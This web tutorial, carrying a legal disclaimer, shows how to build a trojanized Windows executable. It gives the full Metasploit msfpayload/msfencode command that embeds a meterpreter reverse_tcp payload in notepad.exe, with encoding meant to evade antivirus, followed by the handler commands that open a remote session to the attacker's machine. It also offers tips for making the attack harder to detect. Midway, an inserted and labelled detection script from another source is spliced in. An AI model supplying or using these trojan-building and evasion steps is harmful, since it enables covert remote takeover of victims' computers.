hacking Windows remotely with exploited executable

1. The articles contained on the website are for educational purposes only encouraging users and Admins to better understand the environmental security measurement and enable safer digital environment. Geek-KB.com does not encourage, condone, or orchestrate attempts of hacking into other servers or any other illegal activities. All actions taken by users are strictly independent of Geek-KB.com. We are not responsible for any misuse of the techniques listed on this website. 2. Geek-KB.com has the sole discretion to remove/edit users, articles, external resources, or any other user-submitted content to protect itself from legal harm. This legal disclaimer may be modified at any time without notice. 3. Any damage caused by using any of the techniques taken from http://p2847-48- 527.s48.upress.link is at your own risk and responsibility;

How To: Hacking Windows remotely with an exploited executable file

System Requirements:

  1. A Linux machine. You can download BackTrack 5, which already includes everything you need for this How To, from http://www.backtrack-linux.org/downloads/
  2. Metasploit Framework installed. Metasploit can be downloaded from http://www.rapid7.com/products/metasploit/download.jsp

In this article, How To: Create an exploited executable file in order to remotely hack a Windows machine, I will teach you how to exploit an executable file which will be sent to your target Windows computer and will gain you full access privileges once the executable file is run there.

Pre-Requirements:

  • A Linux machine with the Metasploit Framework installed
  • A target Windows machine
  • An executable file (in this example I will use notepad.exe)

Let’s Begin!

The payload type I’m going to use is called reverse_tcp. It means that when the user runs the exploited executable, a TCP/IP session is opened from the target computer to your local computer.
Because the session is opened in the reverse direction, it is much harder for the attacked person to realize that he is actually being attacked, and to identify the source of the attack.

First, run `msfconsole` from your terminal:

We will begin with setting the payload to the exploited executable:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.15.250 LPORT=2222 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /mnt/shared/notepad.exe -o ~itaig/notepad_exp.exe

The payload I chose is ‘windows/meterpreter/reverse_tcp’. I then set the IP and port of my own machine, so that the TCP/IP session which is opened connects to this IP on this port. Using ‘msfencode’, I chose the Shikata Ga Nai encoder while pointing to the source executable file I’d like to set the payload on and the target executable file which will be sent to the target machine. The assumption behind encoded payloads is that fewer anti-virus products will pick up on them. Standard signature detection will be defeated, so the anti-virus program must either unpack the payloads statically, or run the applications dynamically in a sandbox and monitor their behaviour.

We have now finished working on the files, and will set the corresponding settings on the local machine in order to start the listener. These are the commands I used:

 msf> use exploit/multi/handler

Sets msf to work with the multi/handler exploit.

 msf> set payload windows/meterpreter/reverse_tcp

Sets the payload to match a Windows 7 machine and use reverse_tcp.

 msf> set LHOST 192.168.15.250

Sets my own computer’s IP address. The target computer (the one we want to hack) will connect to this IP; it is the same IP which is also embedded in the exploited file I created.

 msf> set LPORT 443

Sets my own computer’s port; the target computer will connect to this port. You can choose any port you wish between 1-65k, but a port lower than 1024 is preferred because then it would be harder to identify the hack.

 msf> exploit

Starts the listener, which waits for the user on the target machine to double-click the file. Once the user on the target machine runs the exploited file, a TCP/IP connection is established between both computers, with the attacked machine as the initiator of the session.
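Seen from the target machine, the session described above is an outbound TCP connection opened by a program that normally has no reason to use the network. The following is an added example, not part of the original article, that applies this check to constructed connection records; the column names, the allow-list, the trusted directories and the user name in the sample path are assumptions.

```python
import csv
import io

# Constructed sample: per-process connection records in the shape an endpoint
# sensor might export. Column names are assumptions made for this example.
SAMPLE_LOG = r"""time,image,initiated,dst_ip,dst_port
2014-01-10T09:12:01,C:\Program Files\Mozilla Firefox\firefox.exe,true,93.184.216.34,443
2014-01-10T09:14:37,C:\Users\bob\Downloads\notepad_exp.exe,true,192.168.15.250,443
2014-01-10T09:15:02,C:\Windows\System32\svchost.exe,true,192.168.15.1,53
2014-01-10T09:20:45,C:\Windows\System32\notepad.exe,true,192.168.15.250,2222
2014-01-10T09:21:10,C:\Windows\System32\svchost.exe,false,192.168.15.40,445
"""

# Assumed allow-list of programs that are expected to open outbound connections.
NETWORK_PROGRAMS = {"firefox.exe", "svchost.exe"}
# Assumed install locations that ordinary users cannot write to.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")


def suspicious_connections(log_text):
    """Return (time, image, destination, reasons) for connections worth triage."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["initiated"] != "true":
            continue  # a reverse session is always opened by the local process
        image = row["image"].lower()
        name = image.rsplit("\\", 1)[-1]
        reasons = []
        if name not in NETWORK_PROGRAMS:
            reasons.append("process is not expected to use the network")
        if not image.startswith(TRUSTED_DIRS):
            reasons.append("image runs from a user-writable path")
        if reasons:  # the destination port is deliberately not a criterion
            dest = f"{row['dst_ip']}:{row['dst_port']}"
            findings.append((row["time"], row["image"], dest, reasons))
    return findings


if __name__ == "__main__":
    for time, image, dest, reasons in suspicious_connections(SAMPLE_LOG):
        print(f"{time} {image} -> {dest}: {'; '.join(reasons)}")
```

Both notepad records are reported whether they connect to port 443 or port 2222, because the check keys on which process opened the connection rather than on the port number.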

You can find more information about the next steps in my article How To: Generate a payloaded executable using Metasploit and hacking windows.

Enjoy and feel free to leave comments or ask questions.

